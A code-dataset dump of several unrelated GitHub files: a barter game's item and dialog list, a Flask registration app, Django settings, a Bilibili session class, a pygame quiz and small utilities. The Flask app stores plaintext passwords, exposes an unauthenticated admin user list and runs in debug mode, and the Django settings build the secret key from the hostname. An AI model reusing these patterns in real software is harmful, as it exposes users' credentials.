) | Neutron-Calibration-in-DUNE/NeutronCaptureGNN | examples/train_model.py | train_model.py | py | 3,160 | python | en | code | 0 | github-code | 50 |
5321499180 | # ITEMS AND DIALOG
# This is the list of items, their value (which is slightly changed for each trader), and their description
# template: {"name":"", "value":1, "desc":""},
ITEMS = [
{"name":"soggy cardboard", "value":1, "desc":"less than completely useless"},
{"name":"dry cardboard", "value":2, "desc":"completely useless"},
{"name":"hardened flower petal", "value":3, "desc":"or you could call it a dead flower petal"},
{"name":"disappointment potion", "value":11, "desc":"it doesn't work"},
{"name":"potion of thirst-quenching", "value":10, "desc":"it's called water"},
{"name":"hollow rock", "value":5, "desc":"there's nothing inside"},
{"name":"artificial cloud generator", "value":15, "desc":"it boils water"},
{"name":"sharpened blade of grass", "value":6, "desc":"disclaimer, use a different sword, this one breaks easily"},
{"name":"troll skin", "value":21, "desc":"fresh from the cheese grater"},
{"name":"grilled worm steak", "value":25, "desc":"tastes just as good as normal steak"},
{"name":"moldy piece of cake", "value":14, "desc":"eat at your own risk"},
{"name":"canned walmart bag", "value":10, "desc":"walmart bags carry groceries, this carries walmart bags!"},
{"name":"bottled water bottle", "value":9, "desc":"just in case you spill it"},
{"name":"beaned beef", "value":13, "desc":"beef filled with beans"},
{"name":"nutty squirrel", "value":27, "desc":"normal squirrel, only eats acorns"},
{"name":"slug butter", "value":23, "desc":"rich and creamy"},
{"name":"cat juice", "value":31, "desc":"what is it? think of squeezing lemons"},
{"name":"crushed eyeball soup", "value":26, "desc":"it takes precision to crush eyeballs"},
{"name":"old cheese", "value":30, "desc":"this cheese is ready for the slaughterhouse"},
{"name":"young cheese", "value":34, "desc":"don't eat it yet, it's just a baby!"},
{"name":"flour patch kids", "value":36, "desc":"for flour-y people, not sour-y people!"},
{"name":"canned artificial flavoring", "value":42, "desc":"tastes like chicken! Or anything, really"},
{"name":"empty recycling box", "value":33, "desc":"you have to find a way to make people fill it"},
{"name":"book of spells", "value":35, "desc":"#1 wizard recommended spellbook"},
{"name":"normal toilet seat", "value":40, "desc":"you were either relieved or confused when you saw the word 'normal' before toilet seat (or possibly unhappy, in which case you must be very bored)"},
{"name":"godly piece of cake", "value":64, "desc":"use it wisely"},
{"name":"golden toilet seat", "value":102, "desc":"you thought it was real gold! HA"},
{"name":"unicorn sprinkles", "value":121, "desc":"no unicorns were harmed in the making of these sprinkles"},
{"name":"100 dalmatians", "value":101, "desc":"we didn't have room for that last one"},
{"name":"radioactive kitten paw", "value":120, "desc":"contains small amount of uranium"},
{"name":"3000-year-old water", "value":3000, "desc":"NEWEST WATER IN THE UNIVERSE"},
{"name":"weasel stomping boots", "value":631, "desc":"titanium soles, automagically detects weasels and brings you to them"},
{"name":"sparkling gemstone water", "value":420, "desc":"melted gemstones + water"},
{"name":"gold from the end of the rainbow", "value":777, "desc":"a rainbow was monitored and tracked carefully (by lunatics) to locate this gold"},
{"name":"blue swedish fish", "value":19.99, "desc":"this color of swedish fish is nearly impossible to find in the wild"},
{"name":"letter cube", "value":26, "desc":"it has all the letters"},
{"name":"completed number cube", "value":123, "desc":"it has all the numbers"},
{"name":"sentient toilet seat", "value":111, "desc":"I'd be nice to it if I were you"},
{"name":"all-seeing toilet seat", "value":666, "desc":"now it can see you even when you aren't sitting on it"},
{"name":"fancy squirrel", "value":420, "desc":"sometimes eats things more expensive than acorns (you'd better keep track of its poop)"},
{"name":"gold ring", "value":79, "desc":"it's a ring made of gold"},
{"name":"unicorn poop", "value":23.22, "desc":"I found a piece of chocolate! my unicorn dropped it"},
{"name":"time machine", "value":77403, "desc":"now you just have to find the keys"},
{"name":"fancy feast", "value":2+2, "desc":"gives your cats superpowers"},
{"name":"dodo bird", "value":1662, "desc":"as dead as a dodo"}
]
# For all these lists, NAME is replaced with the trader's name, SHOP is replaced with the shop name,
# ITEM is replaced with the trader's item's name, ITEMs is replaced with its pluralized form,
# and PRICE is replaced with the trader's price for the item
SHOPNAMES = [
"NAME's Shop Stop",
"NAME's Garage",
"NAME Marketing",
"NAME World",
"NAME's ITEM Palace",
"Easy NAME",
"NAME Express",
"ITEM Express",
"Best ITEMs",
"NAME's ITEMs",
"ITEM House",
"ITEM Store",
"ITEMs Now",
"NAME's ITEM Store",
"NAME's ITEM Stand",
"ITEM World",
"NAME ITEMs",
"NAME's Better ITEMs",
"NAME's ITEM Sale",
"ITEMs R Us"
]
# The following are dialog lists, each in order from angry to happy.
# When there are two with the same name (for example, DIALOG1, DIALOG2),
# it means that they are put together to make the final dialog.
# GREETINGS = [
# '''"What's up, customer?" NAME said, "Not my prices!"''',
# '''"What a lovely day," NAME said, "to buy my ITEMs!"''',
# ]
GREETINGS1 = [
'''"What do you want?" NAME grumbled. ''',
'''"Okay, you came to my shop," NAME shrugged. ''',
'''"My name's NAME," said NAME. ''',
'''"I'm NAME," said NAME. ''',
'''"Hello human," NAME said. ''',
'''"What's up, customer?" NAME said. ''',
'''"What a lovely day," said NAME. ''',
'''"Fine day to buy from me!" NAME exclaimed. ''',
'''"Good day, customer," NAME said cheerfully. ''',
'''"Hello!" said NAME. ''',
'''"A beautiful customer has come!!" NAME yelped happily. '''
]
GREETINGS2 = [
'''"Gimme money."''',
'''"Got any money?"''',
'''"I want your money."''',
'''"How much you gonna pay?"''',
'''"You're gonna give me lots of money!"''',
'''"Buy my ITEMs today!"''',
'''"Welcome to SHOP, where I sell ITEMs to everyone!"''',
'''"You should probably give me some money!"''',
'''"Came for the ITEM, did ya?"''',
'''"Welcome to the finest ITEM shop in the land!"''',
'''"Welcome to SHOP!"''',
]
# Prefix for the next three
BADOFFERCOUNT = [
'''NAME growled. ''',
'''NAME frowned. ''',
'''NAME sighed. ''',
'''NAME: ''',
'''NAME: ''',
'''NAME: ''',
'''NAME smiled. '''
]
# Too many offers
TOOMANY1 = [
'''"One price, you idiot,"''',
'''"I think one price should do,"''',
'''"The price is a very confusing subject, yes?"''',
'''"Only one price is needed"''',
'''"Uhhh.. wat?"''',
'''"Sorry?"''',
'''"What you say?"''',
'''"What was that?"'''
]
TOOMANY2 = [
'''"I'm angry!!"''',
'''"are you dumb?"''',
'''"so get on with it!"''',
'''"it's not that hard."''',
'''"you're not making any sense."''',
'''"you've confused me!"''',
'''"I don't understand your offer."'''
]
# No offers
OFFERNOT1 = [
'''"Give me a price, you imbecile!"''',
'''"A price??!"''',
'''"Offer your price!"''',
'''"What's your offer?"''',
'''"What price do you propose?"''',
'''"You were looking to buy a ITEM?"''',
'''"Give me a price, and we shall make a compromise, yes?"''',
'''"Shoot away, and if the price is right, you might get it cheap,"''',
'''"You like my ITEM? I'll give it to you cheap!"''',
'''"How may I help you, and how much money will you give me?"''',
'''"Make an offer, any offer, and your kindness may reward you!"'''
]
OFFERNOT2 = [
'''"I'm angry!!"''',
'''"are you an idiot?!"''',
'''"or you'll get nothing."''',
'''"it's not that hard!"''',
'''"we're gonna have to discuss the price."''',
'''"we're cheap here!"''',
'''"it is a good day to buy a ITEM!"''',
'''"I do enjoy trading with you!"''',
'''"I like your attitude."''',
'''"it's great to do business together!"''',
'''"what a fine customer you are!"'''
]
# Player keeps saying the same offer
STREAK1 = [
'''"Give me a better offer or you're out!"''',
'''"How many times are you gonna offer the same price?!"''',
'''"You know, just saying the same offer over again won't work,"''',
'''"Offer something else!"''',
'''"That's the same offer as last time!"''',
'''"You already said that!"''',
'''"You're gonna have to offer something other than $OFFER,"'''
]
STREAK2 = [
'''"I'm angry!!"''',
'''"are you an idiot?!"''',
'''"this isn't very effective!"''',
'''"you're boring me!"''',
'''"I won't take it!"''',
'''"I'm not stupid, you know."''',
'''"you gotta switch things up a bit."''',
'''"show me something new."'''
]
# Accept the offer
ACCEPT1 = [
"NAME hesitated. ",
"NAME thought. ",
"NAME nodded. ",
"NAME smiled. ",
"NAME grinned. ",
"NAME clapped. "
]
ACCEPT2 = [
'''"I'll accept that."''',
'''"Okay, that seems reasonable."''',
'''"That's about right."''',
'''"I'll take it!"''',
'''"Thanks for buying at SHOP!"''',
'''"Have a great day!"'''
]
# Deny the offer
DENY1 = [
"NAME snarled. ",
"NAME scoffed. ",
"NAME frowned and narrowed his eyes. ",
"NAME disagreed. ",
"NAME shook his head. ",
"NAME thought. ",
"NAME hesitated. "
]
DENY2 = [
'''"Outrageous! Get out!"''',
'''"You think I'm dumb?"''',
'''"I don't think so."''',
'''"$COMPROMISE, nothing more, nothing less."''',
'''"I will take $COMPROMISE."''',
'''"How about $COMPROMISE?"''',
'''"I'm thinking $COMPROMISE?"''',
'''"What about $COMPROMISE?"'''
]
# Player decides to leave
LEAVE = [
'''"You want nothing?", he said, "Good riddens! Leave at once!"''',
'''NAME: "Begone then, human!"''',
'''"What?" he stammered, "b-but how could you not desire my beautiful ITEM?!"''',
'''NAME: "Goodbye!"''',
'''NAME: "Come back soon!"''',
'''NAME smiled, "Hope to see you again!"''',
'''NAME: "Don't leave, friend! NOOOOOOO!"'''
]
NOTENOUGHMONEY = [
'''NAME: "You idiot! You don't have enough money!"''',
'''NAME: "You can't afford that! Get out!"''',
'''NAME: "You're gonna need more money to buy that"''',
'''NAME: "Sorry, you don't have enough gold for that"''',
'''NAME: "Oh, you need more gold to buy that. Sorry!"'''
]
GETOUT = [
'''NAME fumed, "Get out of here!"'''
]
| jpsank/barter-game | params.py | params.py | py | 10,966 | python | en | code | 0 | github-code | 50 |
10942550044 | from flask import Flask, redirect, url_for, request,render_template
from sqlalchemy.orm import sessionmaker
from users import *
import os
from datetime import datetime
from sqlalchemy import desc
app = Flask(__name__)
engine = create_engine(os.getenv("DATABASE_URL"), echo=True)
Session = sessionmaker(bind = engine)
session = Session()
@app.route("/admin")
def admin():
usrs = session.query(User).order_by(desc(User.timestamp)).all()
return render_template("/Admin.html", data = usrs)
@app.route("/")
def default():
return redirect(url_for('register'))
@app.route('/success/<name>')
def success(name):
return render_template("/Success.html", data = name)
@app.route('/register',methods = ['POST', 'GET'])
def register():
if request.method == 'POST':
user = request.form['email']
pwd = request.form['psw']
pwdcheck = request.form['psw-repeat']
print(user,pwd,pwdcheck)
data = session.query(User).filter_by(user_id=user).all()
if(len(data) > 0):
return "User already exists"
if(pwd == pwdcheck):
try:
usr = User(user_id = user, pwd = pwd, timestamp = datetime.now())
session.add(usr)
session.commit()
return redirect(url_for('success',name = user))
except Exception(e):
return redirect(url_for('error'))
return redirect(url_for('error'))
else:
return render_template('/Register.html')
@app.route('/error')
def error():
return render_template('/Fail.html')
if __name__ == '__main__':
app.run(debug = True)
| ashishk144/wp2 | Day3/application.py | application.py | py | 1,580 | python | en | code | 0 | github-code | 50 |
8964200296 | '''
Сформувати функцію для обчислення цифрового кореню натурального числа.
Цифровий корінь отримується наступним чином: необхідно скласти всі цифри заданого
числа, потім скласти всі цифри знайденої суми і повторювати процес до тих пір, поки
сума не буде дорівнювати однозначному числу, що і буде цифровим коренем заданого
числа
Виконав студент групи 122-А Андрощук Артем Олександрович
'''
'''Тут простіше буде використати рекурсивний метод, час його робити менший, та код легше читається'''
import timeit
print("1 - recursion;\n"
"2 - iteration.")
flag = int(input("What do you want to use?"))
mysetup = ''''''
if flag == 2:
mycode = '''
n = int(input("Input your number: "))
s = str(n)
while len(s) > 1:
n = 0;
for i in s:
n += int(i)
s = str(n)
print("answer is: ", s)
'''
elif flag == 1:
mycode = '''
def root(x):
if len(str(x))==1:
return(x)
else:
return root(sum([int(i) for i in str(x)]))
n = int(input("Input your number: "))
print("answer is: ", root(n))
'''
print("time of a program: ", timeit.timeit(setup=mysetup,
stmt=mycode,
number=1))
| androshchyk11/lab10 | 2.py | 2.py | py | 1,643 | python | uk | code | 0 | github-code | 50 |
28014556955 | from django.conf.global_settings import * # NOQA
import hashlib
import os
import os.path
import socket
import sys
import urlparse
DEBUG = False
TEMPLATE_DEBUG = True
ADMINS = ()
INTERNAL_IPS = ('127.0.0.1',)
MANAGERS = ADMINS
APPEND_SLASH = True
PROJECT_ROOT = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.insert(0, os.path.normpath(os.path.join(PROJECT_ROOT, os.pardir)))
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'ethnoua_geo',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
if 'DATABASE_URL' in os.environ:
url = urlparse.urlparse(os.environ['DATABASE_URL'])
# Ensure default database exists.
DATABASES['default'] = DATABASES.get('default', {})
# Update with environment configuration.
DATABASES['default'].update({
'NAME': url.path[1:],
'USER': url.username,
'PASSWORD': url.password,
'HOST': url.hostname,
'PORT': url.port,
})
if url.scheme == 'postgres':
DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'
if url.scheme == 'mysql':
DATABASES['default']['ENGINE'] = 'django.db.backends.mysql'
EMAIL_SUBJECT_PREFIX = '[Ethnoua] '
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
USE_TZ = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = hashlib.md5(socket.gethostname() + ')*)&8a36)6%74e@-ne5(-!8a(vv#tkv)(eyg&@0=zd^pl!7=y@').hexdigest()
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'ethnoua.conf.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, 'templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.csrf',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'django.contrib.gis',
'django_extensions',
'gunicorn',
'storages',
'south',
'ethnoua'
)
SOUTH_MIGRATION_MODULES = {
'ethnoua': 'ethnoua.migrations',
}
STATIC_ROOT = os.path.realpath(os.path.join(PROJECT_ROOT, 'static'))
STATIC_URL = '/_static/'
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
AWS_STORAGE_BUCKET_NAME = 'ethnoua'
LOCALE_PATHS = (
os.path.join(PROJECT_ROOT, 'locale'),
)
| ethnoua/ethnoua | src/ethnoua/conf/server.py | server.py | py | 4,425 | python | en | code | 0 | github-code | 50 |
30537171697 | import copy
import asyncio
import hashlib
from itertools import count
from typing import Optional
import printer
import conf_loader
import exceptions
from web_session import WebSession
from tasks.login import LoginTask
class User:
_ids = count(0)
__slots__ = (
'id', 'name', 'password', 'alias',
'bililive_session', 'login_session', 'other_session',
'dict_bili', 'app_params',
'_waiting_login', '_loop'
)
def __init__(
self, dict_user: dict, dict_bili: dict):
self.id = next(self._ids)
self.name = dict_user['username']
self.password = dict_user['password']
self.alias = dict_user.get('alias', self.name)
self.bililive_session = WebSession()
self.login_session = WebSession()
self.other_session = WebSession()
# 每个user里面都分享了同一个dict,必须要隔离,否则更新cookie这些的时候会互相覆盖
self.dict_bili = copy.deepcopy(dict_bili)
self.app_params = [
f'actionKey={dict_bili["actionKey"]}',
f'appkey={dict_bili["appkey"]}',
f'build={dict_bili["build"]}',
f'device={dict_bili["device"]}',
f'mobi_app={dict_bili["mobi_app"]}',
f'platform={dict_bili["platform"]}',
]
self.update_login_data(dict_user)
self._waiting_login = None
self._loop = asyncio.get_event_loop()
def update_login_data(self, login_data):
for i, value in login_data.items():
self.dict_bili[i] = value
if i == 'cookie':
self.dict_bili['pcheaders']['cookie'] = value
self.dict_bili['appheaders']['cookie'] = value
conf_loader.write_user(login_data, self.id)
def is_online(self):
return self.dict_bili['pcheaders']['cookie'] and self.dict_bili['appheaders']['cookie']
def info(
self,
*objects,
with_userid=True,
**kwargs):
if with_userid:
printer.info(
*objects,
**kwargs,
extra_info=f'用户id:{self.id} 名字:{self.alias}')
else:
printer.info(*objects, **kwargs)
def infos(self):
pass
def warn(self, *objects, **kwargs):
printer.warn(
*objects,
**kwargs,
extra_info=f'用户id:{self.id} 名字:{self.alias}')
def sort_and_sign(self, extra_params: Optional[list] = None) -> str:
if extra_params is None:
text = "&".join(self.app_params)
else:
text = "&".join(sorted(self.app_params+extra_params))
text_with_appsecret = f'{text}{self.dict_bili["app_secret"]}'
sign = hashlib.md5(text_with_appsecret.encode('utf-8')).hexdigest()
return f'{text}&sign={sign}'
async def req_s(self, func, *args):
while True:
if self._waiting_login is None:
try:
return await func(*args)
except exceptions.LogoutError: # logout
if self._waiting_login is None: # 当前没有处理的运行
self.info('判定出现了登陆失败,且未处理')
self._waiting_login = self._loop.create_future()
try:
await LoginTask.handle_login_status(self)
self.info('已经登陆了')
except asyncio.CancelledError: # 登陆中取消,把waiting_login设置,否则以后的req会一直堵塞
raise
finally:
self._waiting_login.set_result(-1)
self._waiting_login = None
else: # 已有处理的运行了
self.info('判定出现了登陆失败,已经处理')
await self._waiting_login
except exceptions.ForbiddenError:
await asyncio.sleep(600) # 这里简单sleep
else:
await self._waiting_login
def print_status(self):
self.info('当前用户的状态:', None)
| yjqiang/YjMonitor | monitor/user.py | user.py | py | 4,368 | python | en | code | 53 | github-code | 50 |
74679864475 | import json
# Read the JSON file
with open('config.json') as f:
data = json.load(f)
# Print the JSON data in a stylish format
print('## Configuration')
for key, value in data.items():
print('* {}: {}'.format(key, value))
| LearnerMN/Algorithm-Problems | uploader.py | uploader.py | py | 232 | python | en | code | 1 | github-code | 50 |
14349367715 | import sys
input = sys.stdin.readline
T = int(input())
def oneAndTwo(n):
return n // 2 + 1
for _ in range(T):
n = int(input())
answer = 0
for i in range(n // 3 + 1):
answer += oneAndTwo(n - 3*i)
print(answer) | Ohjintaek/Algorithm | Baekjoon/15989.py | 15989.py | py | 239 | python | en | code | 0 | github-code | 50 |
41630766675 | import requests
import csv
import os
from bs4 import BeautifulSoup
from unicodedata import normalize
from pathlib import Path
csvFileName = "alkohol.csv"
txtFileName = "alkohol.txt"
category = Path(txtFileName).stem
def getData(url):
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
req = requests.get(url, headers)
soup = BeautifulSoup(req.content.decode('utf-8', 'ignore'), 'html.parser')
return soup
def parseUrl(url, ind):
data = getData(url)
size, package, code = getProductInfo(data)
images = getProductImages(data)
brand, product = getProductTitle(data)
description = getProductDescription(data)
rate = getProductRating(data)
extras = {"nutritional" : getNutritional(data), "package": package}
fields=[ind, code, size, brand, size, category, description, extras, images, "", "", "", "Swiadome zakupy", "", product, url, ""]
writeRowToCsv(fields)
def getProductInfo(data):
div = data.find("div", class_="well well-small")
divContent = div.contents[1].contents
size, package, code = "", "", ""
if len(divContent) > 1:
size = divContent[1]
if len(divContent) > 3:
package = divContent[3]
if len(divContent) > 5:
code = divContent[5]
return size, package, code
def getProductImages(data):
images = []
thumbnailDivs = data.find_all("div", class_="thumbnail")
for div in thumbnailDivs:
for a in div.find_all('a'):
images.append(a.get('href'))
for a in data.find_all("a", class_="thumbnail"):
images.append(a.get('href'))
return images
def getProductTitle(data):
div = data.find("div", class_="span5")
brand = div.find("h2").contents[0]
product = div.find("h3").contents[0]
return brand, product
def getProductDescription(data):
div = data.find("div", class_="span5")
desc = div.find("p").contents[0]
return desc
def getProductRating(data):
return data.find("h1", class_="rate-winner").contents[0]
def getNutritional(data):
div = data.find("div", class_="nutritional")
nutritional = ""
if div is None:
return nutritional
for nutritionalData in div.find_all('p'):
nutritional = nutritional + nutritionalData.text + ", "
return nutritional
def writeRowToCsv(fields):
isFileExists = os.path.isfile(csvFileName) and os.path.getsize(csvFileName) > 0
with open(csvFileName, 'a', encoding='utf-8') as f:
writer = csv.writer(f)
if not isFileExists:
writer.writerow(",EAN,amount,brand,capacity,category,description,extras,image_url,ingredients,origin,price,seller,storage,title,url,weight".split(','))
writer.writerow(fields)
# Using readlines()
file = open(txtFileName, 'r')
urls = file.readlines()
for ind, url in enumerate(urls):
parseUrl(url, ind)
| Qlanowski/padt | swiadomezakupy/SwiadomeZakupyScrapper.py | SwiadomeZakupyScrapper.py | py | 3,098 | python | en | code | 0 | github-code | 50 |
17060508538 | import pygame
import pygame.gfxdraw
import sys
import time
import random
# the Label class is this module below
from label import *
pygame.init()
pygame.mixer.init()
#hit = pygame.mixer.Sound("sounds/hit.wav")
screen = pygame.display.set_mode((800, 800))
clock = pygame.time.Clock()
buttons = pygame.sprite.Group()
class Button(pygame.sprite.Sprite):
''' A button treated like a Sprite... and killed too '''
def __init__(self, position, text, size,
colors="white on blue",
hover_colors="red on green",
style="button1",
borderc=(255,255,255),
command=lambda: print("No command activated for this button")):
# the hover_colors attribute needs to be fixed
super().__init__()
global num
self.text = text
self.command = command
# --- colors ---
self.colors = colors
self.original_colors = colors
self.fg, self.bg = self.colors.split(" on ")
if hover_colors == "red on green":
self.hover_colors = f"{self.bg} on {self.fg}"
else:
self.hover_colors = hover_colors
self.style = style
self.borderc = borderc # for the style2
# font
self.font = pygame.font.SysFont("Arial", size)
self.render(self.text)
self.x, self.y, self.w , self.h = self.text_render.get_rect()
self.x, self.y = position
self.rect = pygame.Rect(self.x, self.y, 500, self.h)
self.position = position
self.pressed = 1
# the groups with all the buttons
buttons.add(self)
def render(self, text):
# we have a surface
self.text_render = self.font.render(text, 1, self.fg)
# memorize the surface in the image attributes
self.image = self.text_render
def update(self):
self.fg, self.bg = self.colors.split(" on ")
if self.style == "button1":
self.draw_button1()
elif self.style == "button2":
self.draw_button2()
if self.command != None:
self.hover()
self.click()
def draw_button1(self):
''' draws 4 lines around the button and the background '''
# horizontal up
pygame.draw.line(screen, (150, 150, 150), (self.x, self.y), (self.x + self.w , self.y), 5)
pygame.draw.line(screen, (150, 150, 150), (self.x, self.y - 2), (self.x, self.y + self.h), 5)
# horizontal down
pygame.draw.line(screen, (50, 50, 50), (self.x, self.y + self.h), (self.x + self.w , self.y + self.h), 5)
pygame.draw.line(screen, (50, 50, 50), (self.x + self.w , self.y + self.h), [self.x + self.w , self.y], 5)
# background of the button
pygame.draw.rect(screen, self.bg, (self.x, self.y, self.w , self.h))
def draw_button2(self):
''' a linear border '''
pygame.draw.rect(screen, self.bg, (self.x - 50, self.y, 500 , self.h))
pygame.gfxdraw.rectangle(screen, (self.x - 50, self.y, 500 , self.h), self.borderc)
def check_collision(self):
if self.rect.collidepoint(pygame.mouse.get_pos()):
# you can change the colors when the pointer is on the button if you want
self.colors = self.hover_colors
# pygame.mouse.set_cursor(*pygame.cursors.diamond)
else:
self.colors = self.original_colors
# pygame.mouse.set_cursor(*pygame.cursors.arrow)
def hover(self):
''' checks if the mouse is over the button and changes the color if it is true '''
self.check_collision()
def click(self):
''' checks if you click on the button and makes the call to the action just one time'''
if self.rect.collidepoint(pygame.mouse.get_pos()):
if pygame.mouse.get_pressed()[0] and self.pressed == 1:
print("The answer is:'" + self.text + "'")
self.command()
self.pressed = 0
if pygame.mouse.get_pressed() == (0,0,0):
self.pressed = 1
# ACTION FOR BUTTON CLICK ================
def on_click():
print("Click on one answer")
def on_right():
check_score("right")
def on_false():
''' if there is no 'right' as arg it means it's false '''
check_score()
def check_score(answered="wrong"):
''' here we check if the answer is right '''
global qnum, points
# until there are questions (before last)
#hit.play() # click sound
if qnum < len(questions):
print(qnum, len(questions))
if answered == "right":
time.sleep(.1) # to avoid adding more point when pressing too much
points += 1
# Show the score text
qnum += 1 # counter for next question in the list
score.change_text(str(points))
# Change the text of the question
title.change_text(questions[qnum-1][0], color="white")
# change the question number
num_question.change_text(str(qnum))
show_question(qnum) # delete old buttons and show new
# for the last question...
elif qnum == len(questions):
print(qnum, len(questions))
if answered == "right":
kill()
time.sleep(.1)
points +=1
score.change_text("Seu record é de " + str(points))
time.sleep(.5)
# the first answer is right: it will be shuffled, don't worry
# ============================================================
questions = [
["What is the correct file extension for Python files?",
[".py", ".pt", ".ppt", ".pdf"]],
["Which method can be used to remove any whitespace from both the beginning and the end of a string?",
["strip()", "trip()", "trim()", "len()"]],
["Which operator is used to multiply numbers?",
["*", "+", "-", "/"]],
]
# =========== END OF QUESTIONS AND ANSWERS =================
def show_question(qnum):
''' Show questions: '''
pos = [180,218,256,294] #
kill() # Kills the previous buttons/sprites
def numbers():
''' inner function: THE NUMBERS OF THE QUESTION IN ORDER 1 2 3 4 '''
# position of the numbers
for n in range(4):
Button((10, pos[n]),
f"{n+1} ",
36,
"darkred on yellow",
hover_colors="darkred on orange",
style="button2",
borderc=(255,255,0),
command=None)
def questions_shuffler():
# show numbers and answers text
# ============== TEXT: question and answers ====================
comm =[on_right, on_false, on_false, on_false]
for n in range(4):
pass
Button(
(50, pos[n]),
questions[qnum-1][1][n],
36,
"blue on yellow",
hover_colors="blue on orange",
style="button2",
borderc=(255,255,0),
command=comm[n])
numbers()
random.shuffle(pos) # randomized, so that the right one is not on top
questions_shuffler()
def kill():
''' delete buttons when go to the next question '''
for _ in buttons:
_.kill()
qnum = 1
points = 0
# ================= SOME LABELS ==========================
num_question = Label(screen, str(qnum), 0, 0)
title = Label(screen, questions[qnum-1][0], 10, 10, 50, color="cyan")
score = Label(screen, "AV2 Programming", 50, 335)
write1 = Label(screen, "Maria Eduarda, Joana, Rafaela, Rafael", 50, 360, 20, color="white")
def start_again():
pass
def loop():
global game_on
show_question(qnum)
while True:
screen.fill(0)
for event in pygame.event.get(): # ====== quit / exit
if (event.type == pygame.QUIT):
pygame.quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
pygame.quit()
buttons.update() # update buttons
buttons.draw(screen)
show_labels()
# update labels
if points == 3:
winimg = pygame.image.load("python_pygame.png")
screen.blit(winimg, (100, 100))
clock.tick(60)
pygame.display.update()
pygame.quit()
if __name__ == '__main__':
pygame.init()
game_on = 1
loop() | Gravery/anime-selector | example.py | example.py | py | 8,260 | python | en | code | 0 | github-code | 50 |
9774737646 | class DictTrafo(object):
def __init__(self, trafo_dict=None, prefix=None):
if trafo_dict is None:
trafo_dict = {}
self.trafo_dict = trafo_dict
if type(prefix) is str:
self.prefix = (prefix,)
elif type(prefix) is tuple:
self.prefix = prefix
else:
self.prefix = None
def transform(self, in_dict, trafo_dict=None, keep_none=False):
if trafo_dict is None:
trafo_dict = self.trafo_dict
res = {}
for key in trafo_dict:
val = trafo_dict[key]
tval = type(val)
# sub dict
if tval is dict:
vres = self.transform(in_dict, val)
# (callable, rel_path)
elif tval is tuple and len(val) == 2 and callable(val[0]):
rel_path = self.read_rel_path(val[1], in_dict)
vres = val[0](key, rel_path)
# a rel_path in in_dict
elif tval in (str, tuple, list):
vres = self.read_rel_path(val, in_dict)
# invalid
else:
raise ValueError("invalid type in trafo_dict: %s" + val)
if vres is not None or keep_none:
res[key] = vres
return res
def read_rel_path(self, path, in_dict):
abs_path = []
if self.prefix:
abs_path += self.prefix
if type(path) is str:
abs_path.append(path)
else:
abs_path += path
return self.read_path(abs_path, in_dict)
def read_path(self, path, in_dict):
if len(path) == 0:
return in_dict
if type(in_dict) is not dict:
return None
key = path[0]
if key in in_dict:
val = in_dict[key]
path = path[1:]
return self.read_path(path, val)
| cnvogelg/amitools | amitools/vamos/cfgcore/trafo.py | trafo.py | py | 1,867 | python | en | code | 235 | github-code | 50 |
71623147035 | # -*- coding: utf-8 -*-
from PyQt4 import QtGui, QtCore
class MyTextPassage(QtGui.QGraphicsWidget):
def __init__(self, text, headline, width, font, parent=None):
QtGui.QGraphicsWidget.__init__(self, parent)
self.text = text
self.headline = headline
self.font = font
self.label_width = width
self.label_height = 100
def sizeHint(self, which, constraint=QtCore.QSizeF()):
return QtCore.QSizeF(self.label_width, self.label_height)
def paint(self, painter, option, widget):
qp = QtGui.QPen()
qp.setWidth(1)
qp.setBrush(QtCore.Qt.black)
painter.setPen(qp)
text_rect = QtCore.QRect(0, 0,
self.label_width, self.label_height)
painter.setFont(self.font)
painter.drawText(text_rect, QtCore.Qt.TextWordWrap | QtCore.Qt.AlignLeft,
self.headline + "\n" + self.text)
| CrazyCrud/interactiondesign-python | drill4_interaction_techniques/MyTextPassage.py | MyTextPassage.py | py | 907 | python | en | code | 1 | github-code | 50 |
13142596165 | import os
